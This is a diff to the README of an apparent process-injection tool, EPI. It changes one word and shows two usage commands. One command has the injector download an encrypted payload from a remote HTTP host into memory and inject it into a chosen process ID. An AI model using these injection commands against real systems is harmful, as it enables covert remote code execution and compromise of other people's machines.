Kudaes/EPI/README.md

  	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -p 1337 -s

-In case that you built the payload so that it is downloaded directly into memory, the `-u` (remote HTTP site serving the payload) and `-k` (decryption key) must be passed to the injector.
+In case that you built the payload so that it is downloaded directly into memory, the `-u` (remote HTTP site serving the payload) and `-k` (decryption key) flags must be passed to the injector.

 	C:\Users\User\Desktop\EPI\EPI\target\release> epi.exe -p <PID> -u http://remoteip/payload.bin -k setarandomkeyeachtime [flags]